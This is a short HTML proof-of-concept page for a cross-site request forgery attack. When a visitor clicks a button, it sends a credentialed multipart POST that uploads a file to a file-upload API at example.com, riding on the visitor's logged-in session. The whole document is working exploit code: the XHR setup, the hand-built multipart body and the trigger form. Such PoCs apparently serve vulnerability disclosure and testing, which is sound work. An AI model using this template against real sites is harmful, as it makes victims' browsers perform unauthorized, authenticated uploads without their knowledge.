html>
  <!-- CSRF PoC to upload file to sftp.example.org- -->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://www.example.com/api/v1.0/files/", 
true);
        xhr.setRequestHeader("Accept", 
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; 
boundary=---------------------------19278872527677784281970288330");
        xhr.withCredentials = true;
        var body = 
"-----------------------------19278872527677784281970288330\r\n" +
          "Content-Disposition: form-data; name=\"upload[]\"; 
filename=\"AURA_TEST.randomExtension\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "FILEDATA\r\n" +
          
"-----------------------------19278872527677784281970288330--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" 
onclick="submitRequest();" />
    </form>
  </body>
</html>
